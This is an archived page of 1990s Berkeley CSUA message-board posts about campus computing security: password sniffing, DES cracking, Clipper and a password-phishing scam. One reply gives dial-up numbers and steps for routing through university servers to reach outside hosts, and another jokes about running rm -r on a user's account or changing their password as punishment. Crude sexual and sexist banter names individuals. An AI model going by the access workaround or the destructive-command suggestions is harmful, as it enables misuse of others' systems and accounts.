        the Web?  I know they have a page for address change form...
        anyone know what it is?
         \_ I think that you can only do it from their Bear Facts
            macs that are scattered across campus.  - sagarwal
        \_ http://registrar.berkeley.edu:4202/BearFacts.html
           \_ You'd think they coulda spared a couple of IP addresses
              or something to give it it's own host/virtual host ...
         \_Actually DCNS is rather short of IP addresses and would
         rather not have to go buy another block from BBN/Planet
         until they absolutely have to, as the cost of them is going
         way up now that it's for-profit BBN and not the
         non-profit BARRnet running the connections
         Besides, why bother for a server that just says
         "Web access coming soon"?
         \_ They promised to make it accessible via WWW from
          any (campus ?) host but don't bet on it...
          \_ I would - the campus is pushing to get everything
          on the web - less headaches for them that way
1996/6/5 [Computer/SW/Security] UID:31846 Activity:nil
6/4     PLEASE OH PLEASE mount scotch!  Last time I edited my web page,
        I didn't have a beard, and Menudo were still in style.
        \_ it doesn't matter much since no one can access it anyway.
           be patient and someday scotch will be fixed.
           \_ I just want to be able to ftp my files onto UCSEE's web server
              so then people CAN access it.  Please mount it just so that
         we can remove our files.
              \_ We are not going to mount it until scotch is stable.
          As has been mentioned before, if you really really really
          need your files, mail root and someone will get them for
          you and plop them down on soda.       -lila
              \_ How about hacking up a ftpd that allows non-anonymous
          access to scotch to update files?  I could put together
          such a beast... -ERic
1995/3/1 [Computer/SW/Security, Computer/SW/Unix] UID:31773 Activity:nil
3/1     Anyone knows where on campus can I find Xterminals to login directly
        to Soda without a facilities/departmental login?
        \_ yes.
           \_ what a jerk giving these smart ass remarks.
         \_ fuck you. if you want nice friendly advice, get off soda.
             \_ i won't give you the pleasure you nerd.  you can't get
          any.  :P  -word2yomomma!
        \_  343 soda has some xterminals you can use for this, and probably
            the machines in the lounge across the hall also.
            help@soda is generally more cheerful about giving answers.
          --PeterM
           \_ Where is the lounge located exactly and are the machines there
              color terms?  What are the hours for the lounge and 343?
        \_ that _jerk_ can learn something from PeterM. - dookie
1995/3/1-6 [Computer/SW/Security] UID:31768 Activity:nil
2/18    CHANGE YOUR PASSWORD!  Someone has been snooping the net for
        passwords, and apparently got rather a lot of them.
1995/3/1-4 [Computer/SW/Security, Computer/SW/Unix] UID:31767 Activity:nil
2/21    If you would like your account moved to /usr10, mail root. /usr10 has
        lots of space, but has been known to crash.
1995/2/9-11 [Computer/SW/Security] UID:31753 Activity:high
2/9     on-line service surfer wanted for about
        10 hours of work.  send mail to hh@xcf if you're interested.
        you must have familiarty with and access to prodigy, aol,
        and compuserve.

                      _,.-----.,_
                   ,-~           ~-.
                 ,^___           ___^.
                /~"   ~"   .   "~   "~\
               Y  ,--._    I    _.--.  Y
               | Y     ~-. | .-~     Y |
               | |        }:{        | |
               j !       / | \       ! l
            .-~  (__,.--" .^. "--.,__)  ~-.
           (           / / | \ \           )
            \.____,   ~  \/"\/  ~   .____,/
             ^.____                 ____.^
                | |T ~\  !   !  /~ T| |
                | |l   _ _ _ _ _   !| |
                | l \/V V V V V V\/ j |
                l  \ \|_|_|_|_|_|/ /  !
                 \  \[T T T T T T]/  /
                  \  `^-^-^-^-^-^'  /
                   \               /
                    \.           ,/
                      "^-.___.-^"
You're dead.
1995/2/9 [Computer/SW/Security, Computer/SW/Unix] UID:31748 Activity:nil
2/9  Theodore == multiple login from different annex boxes man. Can we turn
        off the little fuckers account now?
          \_that is fucker's ... where is your grammar boy?
             \_ that should be "grammar, boy", as it is
         unlikely that you are talking about a
         child schooled in English who goes around
         explaining mistakes.
           \_ he was just being obtuse. he really meant:
            "... where is your aaron"

theodore  ttyrn    annex-64-1.Berke Thu Feb  9 03:03 - 03:25  (00:22)
theodore  ttyri    annex-64-1.Berke Thu Feb  9 02:58 - 09:40  (06:42)
theodore  ttypC    annex136-4.Berke Thu Feb  9 01:04   still logged in
theodore  ttyrY    annex136-4.Berke Thu Feb  9 00:40 - 02:57  (02:16)
1995/1/21 [Computer/SW/Security, Computer/SW/Unix, Health/Women] UID:31725 Activity:nil
1/20    Do not ask to be blown by root. Rumours of us rendering such
        favors to account holders are highly exaggerated.
        \_ Blow me.
         \_ mail whoeveryouare < prostitute
        \_ Rumor not exaggerated, but we need more women on CSUA staff.
          / \_ This isn't the way to get them...
         | \_ It's a better way to scare them off.
          \_ this pungent tang of feminism confirms a musing I had
             about how a feminist with insight is not a feminist
             at all, but I won't get into it here.
           \_ What makes you think this display of tast
              and maturity only disgusts women?
          \_ I'm sure that's the intent, o wise visionary.
           \_ Men give *way* better head than women.
            \_ You just haven't met the right women.  Or maybe you've just met
        exceptional men.
        \_ You obviously don't understand what I am talking about.
        \_ Rumor has it that ali gives good head.
           \_ not as good as partha (sorry, ali)
              \_ With a name like Banerjee, you know it has to be good
1994/11/11-1995/1/5 [Computer/SW/Security, Computer/SW/Unix] UID:31649 Activity:kinda low
1/5     WWW is now setup on soda.  If you want to setup your own
        home page, cd in /www/<first letter of your login>/<your
        login name>/public_html and put your files there.
        If you do not have a directory in /www/, run
        /usr/local/adm/bin/makeme.
1994/4/28 [Computer/SW/Security, Computer/SW/Unix] UID:31578 Activity:nil
4/27    Someone has a 2.5-megabyte core file in /tmp which has been sitting
        around since 4/26.  Now *I* can't read news because the filesystem's
        full.  Why can't people be even slightly considerate?
        \_ This is soda, that's why.  Nobody gives a shit about what's in
           /tmp and so they don't delete it 'cause it's gonna get nuked
           eventually.  How often does the /tmp sweeper go through anyway?
         \_ Every week or so -- not nearly often enough.  Maybe we
            should have /tmp quotas too.  Say 1 meg soft, 10 megs
            hard or something like that.
          \-that is a stupid idea. look files have names attached
         to them ... just mail the person with a lot of old shit and
         tell them to delete it. cc: root if you want and if someone
         is incessantly a bozo, then root can send something stronger.
           \_ Something stronger you want?  Hmm...how
              about a little chsh or passwd gift?  Or
              maybe just an rm -r on the hoser's acct.
         \_ You twinks, /tmp is cleared of stuff not accessed in 3
            days every night.  Get a clue.
1994/4/11 [Computer/SW/Security, Computer/SW/Unix] UID:31558 Activity:nil
4/10    Still looking for a machine that doesn't crash.  Mail me - root
1994/3/20-4/28 [Computer/SW/Security] UID:31531 Activity:moderate
1/22    Politburo meetings are Fridays at noon in 238 Evans Hall.

         ***UNOFFICIAL MESSAGES BELOW***
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

                  F O R   O F F I C I A L   U S E   O N L Y

                                W A R N I N G

             YOU HAVE REACHED A U.S. GOVERNMENT COMPUTER OR DATA
           BASE, USED SOLELY BY THE U.S. GOVERNMENT, ITS OFFICERS,
              AND AGENTS.  IT IS A VIOLATION OF UNITED STATES CODE, TITLE I8,
        TO ACCESS AND USE U.S. GOVERNMENT COMPUTER RESOURCES WITHOUT
        SPECIFIC AUTHORIZATION.  EACH ACCESS IS SUBJECT TO RECORDING
         AND AUDITING.  WITHOUT SPECIFIC AUTHORIZATION FROM THE U.S.
           GOVERNMENT, YOU ARE AN INTRUDER.  INTRUDERS ARE SUBJECT
             TO CRIMINAL PROSECUTION, FINE, AND/OR IMPRISONMENT.
          ***********************************************************************
            ***COMMUNICATIONS SECURITY MONITORING NOTIFICATION***

            THE USE OF YOUR E-MAIL TERMINAL CONSTITUES CONSENT TO
                      COMMUNICATIONS SECURITY MONITORING
          ***********************************************************************
              FOR ASSISTANCE CONTACT COMMUNITY SERVICES CENTER
               TELEPHONE: (DSN) (510) 642-7453
                    E-MAIL:  Surveilance@soda.berkeley.edu
1994/3/6 [Science, Computer/SW/Security] UID:31503 Activity:nil
3/6  New cryptology advance renders DES _insecure_. Read sci.crypt for
        more info. Basically a machine like soda can break a 10 char crypt
        in about 8 hours. This has SERIOUS security ramifications.
        \_This technology is not that new.  The U.S. government has not
          allowed DES for use with classified documents for years.  This would
          imply that the government has cracked DES long ago.  If the
          civilian population has been able to crack it too, I would not
          be surprised.
        \_Yeah, and I've got a bridge I'd like to sell you, ya twink.
        \_Nice try.
          \_ Actually, I'm not the owner of the account of the person who
             wrote this. I broke into his account using the new super-duper
             technology fu thingy.
        \_ DES never was secure.  They've had DES-cracking LSI chips for at
           least a year that simply do an exhaustive search of the key-space
           really fast.
1994/2/22 [Computer/SW/Security] UID:31494 Activity:nil
2/21    Read ~boss/Clipper for info on the clipper chip, and for a chance
        to add your name to a petition against it.
         \_ The issue of whether the government has a legal right to
            monitor communications (with the proper search warrant)
            is clouded and ignored by bandying about terms like
            "big brother" and "facist." It's ludicrous to think that
            the government will monitor *more* communications if
            Clipper passes.
                   \_ It's not ludicrous at all. Monitoring resources are
                      costly. If Clipper is easier -- cheaper -- to monitor
                      than alternative technologies, than the government
                      can listen in more than they would otherwise. Even
                      totalitarians are subject to economics...
            \_ Encryption now: none.
        Ease of tapping: easy.
        Encryption with Clipper: some.
        Ease of tapping: Less.
        This isn't brain surgery.  The government isn't asking
        for anything it doesn't already have.  Deal with the
        real issues instead of fear-mongering.
          \_ In addition, clipper will fool people into thinking
             they're safe when they aren't...so communications
             that were thought too important to trust to the net
             before will become open to the government.
             \_ Not without a search warrant.
                           \_ No, Clipper will fool *stupid* people into
                              thinking they're safe.  There's a difference.
         \_ It could be argues that Clipper provides increased privacy
            since it gives cell phone makers, etc. free encryption
            with no r&d costs.  I'd prefer knowing the line was secure
            from everyone buty the cops than open to anyone who knows
          what frequency to listen in on...
         \_ You're assuming that this wonderful algorithm that the
            NSA came up with is a good one.  Since it's so secret,
            it could be total bullshit for all anyone knows...although
            far be it for me to imply that the government is somehow
            able to make mistakes...
          \_ With the incredibly quick advances
           in technology, nothing is secure for more than
           a decade or two.
1993/12/10 [Computer/SW/Security, Computer/SW/Unix] UID:31434 Activity:nil
12/8    Apparently some idiot is going around calling soda users, telling
        them he's root@soda and that he needs their current password.
        root@soda would never do this, and if you're stupid enough to be
        duped by this guy, your account will be shut off.
1993/10/11 [Computer/SW/Security] UID:31413 Activity:nil
10/10   Is leaving pgp on soda a good idea?  the physical control of the
        private key is lost when you leave it on soda...  -curious hoding
        \_ You can leave your public keyring here and use PGP via various
           add-ins for EMACS, Elm, and mail.  Then you can download any
           messages and decode them at home.  That's only if you're paranoid
           though.  You can just as easily just take permissions off the
           file and it will pretty safe for casual use.
1993/5/26-28 [Computer/SW/Security, Industry/Jobs] UID:31330 Activity:nil
5/19    Berkeley Systems, Inc (makers of the AfterDark screen saver) is looking
        for a full-time assistant in their Access products group -- products
        to make computers accessable by vision-impaired users.  Complete
        details in ~dwallach/bsi.job
1993/5/26 [Computer/SW/Unix, Computer/SW/Security, Computer/Networking] UID:31325 Activity:nil
5/24    Anybody know of an annex port in the Los Angeles area (818 area)
        that would allow me to connect to Berkeley computers?  kmanoj
        \_  dunno, but netcom has a Point Of Presence in LA area somewheres,
            if it's local to you it'll only be 17.50/mo, and you can use it
            in the bay area also....
        \_  How about numbers for UCLA, USC, or CSUN annex ports?  Anybody
            have those?
               forget it bud.  even if you have those numbers, the annex
            port is like berkeley's, won't let you connect outside its system
        \_  I've heard that the annex port at CalTech allows you to telnet
         out, but you need the IP address for whatever machine.
         Sorry, don't know the phone number.  -jesse
        \_ Okay, here's the story boys and girls.  Connect up to a CSU
           server that's local to you.  There's one in Northridge at
           (818) 701-0478; one in Los Alamos at (310) 985-9540.  From
           there, open a connection to SF State with "sf/40" (port 40).
           Then do a "connect <your-favorite-MUD>" command, and you're
           there!  Connection's kinda slow; but hey, it's semi-free!
           (Dunno about legality, so use at your own risk!)  I also
           have those CalTech numbers, so mail me if you want 'em
           -jctwu
        \_ I've warned them of this security hole and it will shortly
           be turned off.
1993/4/18 [Computer/SW/Security, Computer/SW/Unix] UID:31274 Activity:nil
4/17    /usr/local/csua is a goddamn mess, as is the life file.
        Some root hoser should clean it up instead of looking for
        ``criminals''...
2024/11/23 [General] UID:1000 Activity:popular
11/23   
Results 1 - 150 of 1108   < 1 2 3 4 5 6 7 8 >
Berkeley CSUA MOTD:Computer:SW:Security:
.